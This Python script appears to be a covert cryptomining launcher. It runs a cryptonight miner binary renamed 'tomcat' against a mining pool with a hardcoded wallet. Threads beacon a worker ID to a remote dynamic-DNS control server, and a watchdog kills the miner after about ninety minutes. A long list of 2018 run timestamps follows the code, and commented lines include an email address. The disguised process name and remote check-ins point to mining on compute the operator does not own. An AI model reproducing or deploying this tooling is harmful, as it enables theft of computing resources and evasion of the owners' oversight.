import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:05.396283
#2018-02-17 16:32:06.222699
#2018-02-17 18:20:04.031346
#2018-02-17 20:08:03.963182
#2018-02-17 21:55:07.505714
#2018-02-17 23:40:04.728278
#2018-02-18 01:29:04.821710
#2018-02-18 03:16:05.877062
#2018-02-18 05:04:07.012927
#2018-02-18 06:57:01.723244
#2018-02-18 08:45:06.538539
#2018-02-18 10:32:07.313681
#2018-02-18 12:17:05.096612
#2018-02-18 14:04:04.256793
#2018-02-18 15:54:06.644052
#2018-02-18 17:45:09.682502
#2018-02-18 19:32:06.873190
#2018-02-18 21:17:03.388477
#2018-02-18 23:05:01.815717
#2018-02-19 00:52:07.786610
#2018-02-19 02:39:05.824170
#2018-02-19 04:26:06.568439
#2018-02-19 06:12:01.969910
#2018-02-19 07:59:03.452704
#2018-02-19 09:50:04.159436
#2018-02-19 11:39:02.138361
#2018-02-19 13:25:08.306531
#2018-02-19 15:12:03.781291
#2018-02-19 17:02:06.815982
#2018-02-19 18:48:01.420787
#2018-02-19 20:28:08.836514
#2018-02-19 22:15:08.770615
#2018-02-20 00:01:06.030622
#2018-02-20 01:48:05.775353
#2018-02-20 03:36:02.064341
#2018-02-20 05:22:05.293447
#2018-02-20 07:06:01.472235
#2018-02-20 08:51:07.074689
#2018-02-20 10:35:09.574490
#2018-02-20 12:22:06.861647
#2018-02-20 14:11:06.338330
#2018-02-20 15:54:01.946226
#2018-02-20 17:41:05.382089
#2018-02-20 19:29:04.523646
#2018-02-20 21:16:01.588598
#2018-02-20 22:59:08.894589
#2018-02-21 00:42:07.312557
#2018-02-21 02:27:05.424455
#2018-02-21 04:14:01.514246
#2018-02-21 06:01:07.378295
#2018-02-21 07:48:07.992501
#2018-02-21 09:29:03.962152
#2018-02-21 11:18:06.826900
#2018-02-21 13:06:08.256389
#2018-02-21 14:53:06.354987
#2018-02-21 16:41:08.723738
#2018-02-21 18:31:09.849819
#2018-02-21 20:17:07.958359
#2018-02-21 22:06:06.863048
#2018-02-21 23:52:06.958936
#2018-02-22 01:43:02.125143
#2018-02-22 03:31:04.444712
#2018-02-22 05:18:04.254935
#2018-02-22 07:02:05.236483
#2018-02-22 08:50:01.336959
#2018-02-22 10:38:08.745580
#2018-02-22 12:26:05.585277
#2018-02-22 14:11:06.390968
#2018-02-22 15:58:06.990957
#2018-02-22 17:44:08.596054
#2018-02-22 19:32:01.924179
#2018-02-22 21:24:05.488985
#2018-02-22 23:09:07.731024
#2018-02-23 00:56:03.820800
#2018-02-23 02:44:05.156657
#2018-02-23 04:32:07.816043
#2018-02-23 06:18:06.893775
#2018-02-23 08:04:03.915044
#2018-02-23 10:18:09.576893
#2018-02-23 12:12:07.121404
#2018-02-23 13:58:06.038570
#2018-02-23 15:49:05.939893
#2018-02-23 17:34:08.084464
#2018-02-23 19:20:04.858945
#2018-02-23 21:04:04.834023
#2018-02-23 22:51:05.320911
#2018-02-24 00:38:04.026460
#2018-02-24 02:28:04.290992
#2018-02-24 04:19:04.637355
#2018-02-24 06:06:07.505843
#2018-02-24 07:53:04.556682
#2018-02-24 09:39:04.435881
#2018-02-24 11:34:06.825216
#2018-02-24 13:25:06.038819
#2018-02-24 15:13:04.603968
#2018-02-24 17:02:06.654640
#2018-02-24 18:51:06.345016
#2018-02-24 20:40:08.053176
#2018-02-24 22:48:07.360619
#2018-02-25 02:09:04.843972
#2018-02-25 05:53:05.584673
#2018-02-25 11:38:06.467266